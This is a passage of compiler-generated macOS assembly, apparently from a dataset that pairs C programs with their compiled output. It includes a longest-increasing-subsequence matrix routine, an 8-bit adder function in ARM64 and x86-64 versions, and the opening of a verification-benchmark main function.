cmpl -12(%rbp), %eax
jge LBB1_18
## %bb.12: ## in Loop: Header=BB1_11 Depth=2
movl -20(%rbp), %eax
movl %eax, -24(%rbp)
LBB1_13: ## Parent Loop BB1_9 Depth=1
## Parent Loop BB1_11 Depth=2
## => This Inner Loop Header: Depth=3
movl -24(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB1_16
## %bb.14: ## in Loop: Header=BB1_13 Depth=3
movslq -28(%rbp), %rcx
movq _matrix@GOTPCREL(%rip), %rax
imulq $40804, %rcx, %rcx ## imm = 0x9F64
addq %rcx, %rax
movslq -20(%rbp), %rcx
imulq $404, %rcx, %rcx ## imm = 0x194
addq %rcx, %rax
movslq -24(%rbp), %rcx
movl $0, (%rax,%rcx,4)
## %bb.15: ## in Loop: Header=BB1_13 Depth=3
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB1_13
LBB1_16: ## in Loop: Header=BB1_11 Depth=2
jmp LBB1_17
LBB1_17: ## in Loop: Header=BB1_11 Depth=2
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB1_11
LBB1_18: ## in Loop: Header=BB1_9 Depth=1
jmp LBB1_19
LBB1_19: ## in Loop: Header=BB1_9 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB1_9
LBB1_20:
movl -12(%rbp), %edx
movl -12(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
movq _matrix@GOTPCREL(%rip), %rax
movl %edx, (%rax,%rcx,4)
movl $1, -28(%rbp)
LBB1_21: ## =>This Loop Header: Depth=1
## Child Loop BB1_23 Depth 2
## Child Loop BB1_25 Depth 3
## Child Loop BB1_30 Depth 4
movl -28(%rbp), %eax
cmpl -40(%rbp), %eax
jge LBB1_41
## %bb.22: ## in Loop: Header=BB1_21 Depth=1
movl -12(%rbp), %eax
subl $1, %eax
movl %eax, -20(%rbp)
LBB1_23: ## Parent Loop BB1_21 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB1_25 Depth 3
## Child Loop BB1_30 Depth 4
cmpl $0, -20(%rbp)
jl LBB1_39
## %bb.24: ## in Loop: Header=BB1_23 Depth=2
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
LBB1_25: ## Parent Loop BB1_21 Depth=1
## Parent Loop BB1_23 Depth=2
## => This Loop Header: Depth=3
## Child Loop BB1_30 Depth 4
movl -24(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB1_37
## %bb.26: ## in Loop: Header=BB1_25 Depth=3
movslq -20(%rbp), %rcx
movq _pairwiseLIS@GOTPCREL(%rip), %rax
imulq $404, %rcx, %rcx ## imm = 0x194
addq %rcx, %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %eax
movl -28(%rbp), %ecx
addl $1, %ecx
cmpl %ecx, %eax
jl LBB1_28
## %bb.27: ## in Loop: Header=BB1_25 Depth=3
movslq -20(%rbp), %rcx
movq _pairwiseLIS@GOTPCREL(%rip), %rax
imulq $404, %rcx, %rcx ## imm = 0x194
addq %rcx, %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %edx
movslq -28(%rbp), %rcx
movq _matrix@GOTPCREL(%rip), %rax
imulq $40804, %rcx, %rcx ## imm = 0x9F64
addq %rcx, %rax
movslq -20(%rbp), %rcx
imulq $404, %rcx, %rcx ## imm = 0x194
addq %rcx, %rax
movslq -24(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
jmp LBB1_29
LBB1_28: ## in Loop: Header=BB1_25 Depth=3
movslq -28(%rbp), %rcx
movq _matrix@GOTPCREL(%rip), %rax
imulq $40804, %rcx, %rcx ## imm = 0x9F64
addq %rcx, %rax
movslq -20(%rbp), %rcx
imulq $404, %rcx, %rcx ## imm = 0x194
addq %rcx, %rax
movslq -24(%rbp), %rcx
movl $0, (%rax,%rcx,4)
LBB1_29: ## in Loop: Header=BB1_25 Depth=3
movl -20(%rbp), %eax
movl %eax, -32(%rbp)
LBB1_30: ## Parent Loop BB1_21 Depth=1
## Parent Loop BB1_23 Depth=2
## Parent Loop BB1_25 Depth=3
## => This Inner Loop Header: Depth=4
movl -32(%rbp), %eax
cmpl -24(%rbp), %eax
jge LBB1_35
## %bb.31: ## in Loop: Header=BB1_30 Depth=4
movslq -28(%rbp), %rcx
movq _matrix@GOTPCREL(%rip), %rax
imulq $40804, %rcx, %rcx ## imm = 0x9F64
addq %rcx, %rax
movslq -20(%rbp), %rcx
imulq $404, %rcx, %rcx ## imm = 0x194
addq %rcx, %rax
movslq -32(%rbp), %rcx
movl (%rax,%rcx,4), %eax
movslq -28(%rbp), %rdx
movq _matrix@GOTPCREL(%rip), %rcx
imulq $40804, %rdx, %rdx ## imm = 0x9F64
addq %rdx, %rcx
movl -32(%rbp), %edx
addl $1, %edx
movslq %edx, %rdx
imulq $404, %rdx, %rdx ## imm = 0x194
addq %rdx, %rcx
movslq -24(%rbp), %rdx
addl (%rcx,%rdx,4), %eax
movl %eax, -36(%rbp)
movl -36(%rbp), %eax
movslq -28(%rbp), %rdx
movq _matrix@GOTPCREL(%rip), %rcx
imulq $40804, %rdx, %rdx ## imm = 0x9F64
addq %rdx, %rcx
movslq -20(%rbp), %rdx
imulq $404, %rdx, %rdx ## imm = 0x194
addq %rdx, %rcx
movslq -24(%rbp), %rdx
cmpl (%rcx,%rdx,4), %eax
jle LBB1_33
## %bb.32: ## in Loop: Header=BB1_30 Depth=4
movl -36(%rbp), %edx
movslq -28(%rbp), %rcx
movq _matrix@GOTPCREL(%rip), %rax
imulq $40804, %rcx, %rcx ## imm = 0x9F64
addq %rcx, %rax
movslq -20(%rbp), %rcx
imulq $404, %rcx, %rcx ## imm = 0x194
addq %rcx, %rax
movslq -24(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
LBB1_33: ## in Loop: Header=BB1_30 Depth=4
jmp LBB1_34
LBB1_34: ## in Loop: Header=BB1_30 Depth=4
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB1_30
LBB1_35: ## in Loop: Header=BB1_25 Depth=3
jmp LBB1_36
LBB1_36: ## in Loop: Header=BB1_25 Depth=3
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB1_25
LBB1_37: ## in Loop: Header=BB1_23 Depth=2
jmp LBB1_38
LBB1_38: ## in Loop: Header=BB1_23 Depth=2
movl -20(%rbp), %eax
addl $-1, %eax
movl %eax, -20(%rbp)
jmp LBB1_23
LBB1_39: ## in Loop: Header=BB1_21 Depth=1
jmp LBB1_40
LBB1_40: ## in Loop: Header=BB1_21 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB1_21
LBB1_41:
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _lis ## -- Begin function lis
.p2align 4, 0x90
_lis: ## @lis
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl $0, -24(%rbp)
movl $0, -16(%rbp)
LBB2_1: ## =>This Loop Header: Depth=1
## Child Loop BB2_3 Depth 2
movl -16(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB2_12
## %bb.2: ## in Loop: Header=BB2_1 Depth=1
movl $-1, -28(%rbp)
movl -24(%rbp), %eax
movl %eax, -32(%rbp)
LBB2_3: ## Parent Loop BB2_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -28(%rbp), %eax
movl -32(%rbp), %ecx
subl $1, %ecx
cmpl %ecx, %eax
jge LBB2_8
## %bb.4: ## in Loop: Header=BB2_3 Depth=2
movl -28(%rbp), %eax
addl -32(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, -36(%rbp)
movslq -36(%rbp), %rcx
movq _lisArray@GOTPCREL(%rip), %rax
movl (%rax,%rcx,4), %eax
movq -8(%rbp), %rcx
movslq -16(%rbp), %rdx
cmpl (%rcx,%rdx,4), %eax
jge LBB2_6
## %bb.5: ## in Loop: Header=BB2_3 Depth=2
movl -36(%rbp), %eax
movl %eax, -28(%rbp)
jmp LBB2_7
LBB2_6: ## in Loop: Header=BB2_3 Depth=2
movl -36(%rbp), %eax
movl %eax, -32(%rbp)
LBB2_7: ## in Loop: Header=BB2_3 Depth=2
jmp LBB2_3
LBB2_8: ## in Loop: Header=BB2_1 Depth=1
movq -8(%rbp), %rax
movslq -16(%rbp), %rcx
movl (%rax,%rcx,4), %edx
movslq -32(%rbp), %rcx
movq _lisArray@GOTPCREL(%rip), %rax
movl %edx, (%rax,%rcx,4)
movl -32(%rbp), %eax
cmpl -24(%rbp), %eax
jne LBB2_10
## %bb.9: ## in Loop: Header=BB2_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
LBB2_10: ## in Loop: Header=BB2_1 Depth=1
jmp LBB2_11
LBB2_11: ## in Loop: Header=BB2_1 Depth=1
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB2_1
LBB2_12:
movl -24(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "mnois.in"
L_.str.1: ## @.str.1
.asciz "r"
L_.str.2: ## @.str.2
.asciz "%d"
.comm _array,404,4 ## @array
.comm _matrix,4121204,4 ## @matrix
L_.str.3: ## @.str.3
.asciz " %d"
L_.str.4: ## @.str.4
.asciz "\n"
.comm _pairwiseLIS,40804,4 ## @pairwiseLIS
.comm _lisArray,404,4 ## @lisArray
.subsections_via_symbols
| the_stack_data/90361.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _add8_253 ; -- Begin function add8_253
.p2align 2
_add8_253: ; @add8_253
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
strb w0, [sp, #47]
strb w1, [sp, #46]
strh wzr, [sp, #44]
ldrb w8, [sp, #47]
asr w8, w8, #0
and w8, w8, #0x1
strb w8, [sp, #43]
ldrb w8, [sp, #47]
asr w8, w8, #1
and w8, w8, #0x1
strb w8, [sp, #42]
ldrb w8, [sp, #47]
asr w8, w8, #2
and w8, w8, #0x1
strb w8, [sp, #41]
ldrb w8, [sp, #47]
asr w8, w8, #3
and w8, w8, #0x1
strb w8, [sp, #40]
ldrb w8, [sp, #47]
asr w8, w8, #4
and w8, w8, #0x1
strb w8, [sp, #39]
ldrb w8, [sp, #47]
asr w8, w8, #5
and w8, w8, #0x1
strb w8, [sp, #38]
ldrb w8, [sp, #47]
asr w8, w8, #6
and w8, w8, #0x1
strb w8, [sp, #37]
ldrb w8, [sp, #47]
asr w8, w8, #7
and w8, w8, #0x1
strb w8, [sp, #36]
ldrb w8, [sp, #46]
asr w8, w8, #0
and w8, w8, #0x1
strb w8, [sp, #35]
ldrb w8, [sp, #46]
asr w8, w8, #1
and w8, w8, #0x1
strb w8, [sp, #34]
ldrb w8, [sp, #46]
asr w8, w8, #2
and w8, w8, #0x1
strb w8, [sp, #33]
ldrb w8, [sp, #46]
asr w8, w8, #3
and w8, w8, #0x1
strb w8, [sp, #32]
ldrb w8, [sp, #46]
asr w8, w8, #4
and w8, w8, #0x1
strb w8, [sp, #31]
ldrb w8, [sp, #46]
asr w8, w8, #5
and w8, w8, #0x1
strb w8, [sp, #30]
ldrb w8, [sp, #46]
asr w8, w8, #6
and w8, w8, #0x1
strb w8, [sp, #29]
ldrb w8, [sp, #46]
asr w8, w8, #7
and w8, w8, #0x1
strb w8, [sp, #28]
ldrb w8, [sp, #43]
ldrb w9, [sp, #35]
orr w8, w8, w9
strb w8, [sp, #27]
ldrb w8, [sp, #36]
ldrb w9, [sp, #30]
orr w8, w8, w9
ldrb w9, [sp, #28]
orr w8, w8, w9
mvn w8, w8
strb w8, [sp, #26]
ldrb w8, [sp, #26]
ldrb w9, [sp, #34]
and w8, w8, w9
ldrb w9, [sp, #35]
and w8, w8, w9
mvn w8, w8
strb w8, [sp, #25]
ldrb w8, [sp, #25]
ldrb w9, [sp, #37]
orr w8, w8, w9
ldrb w9, [sp, #41]
orr w8, w8, w9
mvn w8, w8
strb w8, [sp, #24]
ldrb w8, [sp, #24]
ldrb w9, [sp, #43]
and w8, w8, w9
ldrb w9, [sp, #42]
and w8, w8, w9
mvn w8, w8
strb w8, [sp, #23]
ldrb w8, [sp, #33]
ldrb w9, [sp, #23]
orr w8, w8, w9
mvn w8, w8
strb w8, [sp, #22]
ldrb w8, [sp, #42]
ldrb w9, [sp, #34]
orr w8, w8, w9
strb w8, [sp, #21]
ldrb w8, [sp, #41]
ldrb w9, [sp, #33]
eor w8, w8, w9
ldrb w9, [sp, #22]
eor w8, w8, w9
strb w8, [sp, #20]
ldrb w8, [sp, #41]
ldrb w9, [sp, #33]
and w8, w8, w9
ldrb w9, [sp, #33]
ldrb w10, [sp, #22]
and w9, w9, w10
orr w8, w8, w9
ldrb w9, [sp, #41]
ldrb w10, [sp, #22]
and w9, w9, w10
orr w8, w8, w9
strb w8, [sp, #19]
ldrb w8, [sp, #40]
ldrb w9, [sp, #32]
eor w8, w8, w9
ldrb w9, [sp, #19]
eor w8, w8, w9
strb w8, [sp, #18]
ldrb w8, [sp, #40]
ldrb w9, [sp, #32]
and w8, w8, w9
ldrb w9, [sp, #32]
ldrb w10, [sp, #19]
and w9, w9, w10
orr w8, w8, w9
ldrb w9, [sp, #40]
ldrb w10, [sp, #19]
and w9, w9, w10
orr w8, w8, w9
strb w8, [sp, #17]
ldrb w8, [sp, #39]
ldrb w9, [sp, #31]
eor w8, w8, w9
ldrb w9, [sp, #17]
eor w8, w8, w9
strb w8, [sp, #16]
ldrb w8, [sp, #39]
ldrb w9, [sp, #31]
and w8, w8, w9
ldrb w9, [sp, #31]
ldrb w10, [sp, #17]
and w9, w9, w10
orr w8, w8, w9
ldrb w9, [sp, #39]
ldrb w10, [sp, #17]
and w9, w9, w10
orr w8, w8, w9
strb w8, [sp, #15]
ldrb w8, [sp, #38]
ldrb w9, [sp, #30]
eor w8, w8, w9
ldrb w9, [sp, #15]
eor w8, w8, w9
strb w8, [sp, #14]
ldrb w8, [sp, #38]
ldrb w9, [sp, #30]
and w8, w8, w9
ldrb w9, [sp, #30]
ldrb w10, [sp, #15]
and w9, w9, w10
orr w8, w8, w9
ldrb w9, [sp, #38]
ldrb w10, [sp, #15]
and w9, w9, w10
orr w8, w8, w9
strb w8, [sp, #13]
ldrb w8, [sp, #37]
ldrb w9, [sp, #29]
eor w8, w8, w9
ldrb w9, [sp, #13]
eor w8, w8, w9
strb w8, [sp, #12]
ldrb w8, [sp, #37]
ldrb w9, [sp, #29]
and w8, w8, w9
ldrb w9, [sp, #29]
ldrb w10, [sp, #13]
and w9, w9, w10
orr w8, w8, w9
ldrb w9, [sp, #37]
ldrb w10, [sp, #13]
and w9, w9, w10
orr w8, w8, w9
strb w8, [sp, #11]
ldrb w8, [sp, #36]
ldrb w9, [sp, #28]
eor w8, w8, w9
ldrb w9, [sp, #11]
eor w8, w8, w9
strb w8, [sp, #10]
ldrb w8, [sp, #36]
ldrb w9, [sp, #28]
and w8, w8, w9
ldrb w9, [sp, #28]
ldrb w10, [sp, #11]
and w9, w9, w10
orr w8, w8, w9
ldrb w9, [sp, #36]
ldrb w10, [sp, #11]
and w9, w9, w10
orr w8, w8, w9
strb w8, [sp, #9]
ldrb w8, [sp, #27]
and w9, w8, #0x1
ldrh w8, [sp, #44]
orr w8, w8, w9
strh w8, [sp, #44]
ldrb w8, [sp, #21]
and w9, w8, #0x1
ldrh w8, [sp, #44]
orr w8, w8, w9, lsl #1
strh w8, [sp, #44]
ldrb w8, [sp, #20]
and w9, w8, #0x1
ldrh w8, [sp, #44]
orr w8, w8, w9, lsl #2
strh w8, [sp, #44]
ldrb w8, [sp, #18]
and w9, w8, #0x1
ldrh w8, [sp, #44]
orr w8, w8, w9, lsl #3
strh w8, [sp, #44]
ldrb w8, [sp, #16]
and w9, w8, #0x1
ldrh w8, [sp, #44]
orr w8, w8, w9, lsl #4
strh w8, [sp, #44]
ldrb w8, [sp, #14]
and w9, w8, #0x1
ldrh w8, [sp, #44]
orr w8, w8, w9, lsl #5
strh w8, [sp, #44]
ldrb w8, [sp, #12]
and w9, w8, #0x1
ldrh w8, [sp, #44]
orr w8, w8, w9, lsl #6
strh w8, [sp, #44]
ldrb w8, [sp, #10]
and w9, w8, #0x1
ldrh w8, [sp, #44]
orr w8, w8, w9, lsl #7
strh w8, [sp, #44]
ldrb w8, [sp, #9]
and w9, w8, #0x1
ldrh w8, [sp, #44]
orr w8, w8, w9, lsl #8
strh w8, [sp, #44]
ldrh w0, [sp, #44]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _add8_253 ## -- Begin function add8_253
.p2align 4, 0x90
_add8_253: ## @add8_253
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %sil, %al
movb %dil, %cl
movb %cl, -1(%rbp)
movb %al, -2(%rbp)
movw $0, -4(%rbp)
movzbl -1(%rbp), %eax
sarl $0, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -5(%rbp)
movzbl -1(%rbp), %eax
sarl $1, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -6(%rbp)
movzbl -1(%rbp), %eax
sarl $2, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -7(%rbp)
movzbl -1(%rbp), %eax
sarl $3, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -8(%rbp)
movzbl -1(%rbp), %eax
sarl $4, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -9(%rbp)
movzbl -1(%rbp), %eax
sarl $5, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -10(%rbp)
movzbl -1(%rbp), %eax
sarl $6, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -11(%rbp)
movzbl -1(%rbp), %eax
sarl $7, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -12(%rbp)
movzbl -2(%rbp), %eax
sarl $0, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -13(%rbp)
movzbl -2(%rbp), %eax
sarl $1, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -14(%rbp)
movzbl -2(%rbp), %eax
sarl $2, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -15(%rbp)
movzbl -2(%rbp), %eax
sarl $3, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -16(%rbp)
movzbl -2(%rbp), %eax
sarl $4, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -17(%rbp)
movzbl -2(%rbp), %eax
sarl $5, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -18(%rbp)
movzbl -2(%rbp), %eax
sarl $6, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -19(%rbp)
movzbl -2(%rbp), %eax
sarl $7, %eax
andl $1, %eax
## kill: def $al killed $al killed $eax
movb %al, -20(%rbp)
movzbl -5(%rbp), %eax
movzbl -13(%rbp), %ecx
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -21(%rbp)
movzbl -12(%rbp), %eax
movzbl -18(%rbp), %ecx
orl %ecx, %eax
movzbl -20(%rbp), %ecx
orl %ecx, %eax
xorl $-1, %eax
## kill: def $al killed $al killed $eax
movb %al, -22(%rbp)
movzbl -22(%rbp), %eax
movzbl -14(%rbp), %ecx
andl %ecx, %eax
movzbl -13(%rbp), %ecx
andl %ecx, %eax
xorl $-1, %eax
## kill: def $al killed $al killed $eax
movb %al, -23(%rbp)
movzbl -23(%rbp), %eax
movzbl -11(%rbp), %ecx
orl %ecx, %eax
movzbl -7(%rbp), %ecx
orl %ecx, %eax
xorl $-1, %eax
## kill: def $al killed $al killed $eax
movb %al, -24(%rbp)
movzbl -24(%rbp), %eax
movzbl -5(%rbp), %ecx
andl %ecx, %eax
movzbl -6(%rbp), %ecx
andl %ecx, %eax
xorl $-1, %eax
## kill: def $al killed $al killed $eax
movb %al, -25(%rbp)
movzbl -15(%rbp), %eax
movzbl -25(%rbp), %ecx
orl %ecx, %eax
xorl $-1, %eax
## kill: def $al killed $al killed $eax
movb %al, -26(%rbp)
movzbl -6(%rbp), %eax
movzbl -14(%rbp), %ecx
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -27(%rbp)
movzbl -7(%rbp), %eax
movzbl -15(%rbp), %ecx
xorl %ecx, %eax
movzbl -26(%rbp), %ecx
xorl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -28(%rbp)
movzbl -7(%rbp), %eax
movzbl -15(%rbp), %ecx
andl %ecx, %eax
movzbl -15(%rbp), %ecx
movzbl -26(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
movzbl -7(%rbp), %ecx
movzbl -26(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -29(%rbp)
movzbl -8(%rbp), %eax
movzbl -16(%rbp), %ecx
xorl %ecx, %eax
movzbl -29(%rbp), %ecx
xorl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -30(%rbp)
movzbl -8(%rbp), %eax
movzbl -16(%rbp), %ecx
andl %ecx, %eax
movzbl -16(%rbp), %ecx
movzbl -29(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
movzbl -8(%rbp), %ecx
movzbl -29(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -31(%rbp)
movzbl -9(%rbp), %eax
movzbl -17(%rbp), %ecx
xorl %ecx, %eax
movzbl -31(%rbp), %ecx
xorl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -32(%rbp)
movzbl -9(%rbp), %eax
movzbl -17(%rbp), %ecx
andl %ecx, %eax
movzbl -17(%rbp), %ecx
movzbl -31(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
movzbl -9(%rbp), %ecx
movzbl -31(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -33(%rbp)
movzbl -10(%rbp), %eax
movzbl -18(%rbp), %ecx
xorl %ecx, %eax
movzbl -33(%rbp), %ecx
xorl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -34(%rbp)
movzbl -10(%rbp), %eax
movzbl -18(%rbp), %ecx
andl %ecx, %eax
movzbl -18(%rbp), %ecx
movzbl -33(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
movzbl -10(%rbp), %ecx
movzbl -33(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -35(%rbp)
movzbl -11(%rbp), %eax
movzbl -19(%rbp), %ecx
xorl %ecx, %eax
movzbl -35(%rbp), %ecx
xorl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -36(%rbp)
movzbl -11(%rbp), %eax
movzbl -19(%rbp), %ecx
andl %ecx, %eax
movzbl -19(%rbp), %ecx
movzbl -35(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
movzbl -11(%rbp), %ecx
movzbl -35(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -37(%rbp)
movzbl -12(%rbp), %eax
movzbl -20(%rbp), %ecx
xorl %ecx, %eax
movzbl -37(%rbp), %ecx
xorl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -38(%rbp)
movzbl -12(%rbp), %eax
movzbl -20(%rbp), %ecx
andl %ecx, %eax
movzbl -20(%rbp), %ecx
movzbl -37(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
movzbl -12(%rbp), %ecx
movzbl -37(%rbp), %edx
andl %edx, %ecx
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -39(%rbp)
movzbl -21(%rbp), %ecx
andl $1, %ecx
shll $0, %ecx
movzwl -4(%rbp), %eax
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -4(%rbp)
movzbl -27(%rbp), %ecx
andl $1, %ecx
shll $1, %ecx
movzwl -4(%rbp), %eax
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -4(%rbp)
movzbl -28(%rbp), %ecx
andl $1, %ecx
shll $2, %ecx
movzwl -4(%rbp), %eax
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -4(%rbp)
movzbl -30(%rbp), %ecx
andl $1, %ecx
shll $3, %ecx
movzwl -4(%rbp), %eax
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -4(%rbp)
movzbl -32(%rbp), %ecx
andl $1, %ecx
shll $4, %ecx
movzwl -4(%rbp), %eax
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -4(%rbp)
movzbl -34(%rbp), %ecx
andl $1, %ecx
shll $5, %ecx
movzwl -4(%rbp), %eax
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -4(%rbp)
movzbl -36(%rbp), %ecx
andl $1, %ecx
shll $6, %ecx
movzwl -4(%rbp), %eax
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -4(%rbp)
movzbl -38(%rbp), %ecx
andl $1, %ecx
shll $7, %ecx
movzwl -4(%rbp), %eax
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -4(%rbp)
movzbl -39(%rbp), %ecx
andl $1, %ecx
shll $8, %ecx
movzwl -4(%rbp), %eax
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -4(%rbp)
movzwl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/101933.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl ___VERIFIER_nondet_bool ; -- Begin function __VERIFIER_nondet_bool
.p2align 2
___VERIFIER_nondet_bool: ; @__VERIFIER_nondet_bool
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
bl ___VERIFIER_nondet_int
subs w8, w0, #0
cset w8, ne
and w8, w8, #0x1
sxtb w0, w8
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-96]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 96
stp x26, x25, [sp, #16] ; 16-byte Folded Spill
stp x24, x23, [sp, #32] ; 16-byte Folded Spill
stp x22, x21, [sp, #48] ; 16-byte Folded Spill
stp x20, x19, [sp, #64] ; 16-byte Folded Spill
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w19, -24
.cfi_offset w20, -32
.cfi_offset w21, -40
.cfi_offset w22, -48
.cfi_offset w23, -56
.cfi_offset w24, -64
.cfi_offset w25, -72
.cfi_offset w26, -80
.cfi_offset w27, -88
.cfi_offset w28, -96
sub sp, sp, #1136
adrp x8, _sm21_l@GOTPAGE
ldr x8, [x8, _sm21_l@GOTPAGEOFF]
str x8, [sp, #568] ; 8-byte Folded Spill
adrp x8, _sm21_loop_len@GOTPAGE
ldr x8, [x8, _sm21_loop_len@GOTPAGEOFF]
str x8, [sp, #576] ; 8-byte Folded Spill
adrp x8, _sm20_l@GOTPAGE
ldr x8, [x8, _sm20_l@GOTPAGEOFF]
str x8, [sp, #584] ; 8-byte Folded Spill
adrp x8, _sm20_loop_len@GOTPAGE
ldr x8, [x8, _sm20_loop_len@GOTPAGEOFF]
str x8, [sp, #592] ; 8-byte Folded Spill
adrp x8, _sm19_l@GOTPAGE
ldr x8, [x8, _sm19_l@GOTPAGEOFF]
str x8, [sp, #600] ; 8-byte Folded Spill
adrp x8, _sm19_loop_len@GOTPAGE
ldr x8, [x8, _sm19_loop_len@GOTPAGEOFF]
str x8, [sp, #608] ; 8-byte Folded Spill
adrp x8, _sm7_state@GOTPAGE
ldr x8, [x8, _sm7_state@GOTPAGEOFF]
str x8, [sp, #616] ; 8-byte Folded Spill
adrp x8, _sm6_state@GOTPAGE
ldr x8, [x8, _sm6_state@GOTPAGEOFF]
str x8, [sp, #624] ; 8-byte Folded Spill
adrp x8, _sm8_l@GOTPAGE
ldr x8, [x8, _sm8_l@GOTPAGEOFF]
str x8, [sp, #632] ; 8-byte Folded Spill
adrp x8, _sm4_state@GOTPAGE
ldr x8, [x8, _sm4_state@GOTPAGEOFF]
str x8, [sp, #640] ; 8-byte Folded Spill
adrp x8, _sm3_state@GOTPAGE
ldr x8, [x8, _sm3_state@GOTPAGEOFF]
str x8, [sp, #648] ; 8-byte Folded Spill
adrp x8, _sm6_l@GOTPAGE
ldr x8, [x8, _sm6_l@GOTPAGEOFF]
str x8, [sp, #656] ; 8-byte Folded Spill
adrp x8, _sm7_l@GOTPAGE
ldr x8, [x8, _sm7_l@GOTPAGEOFF]
str x8, [sp, #664] ; 8-byte Folded Spill
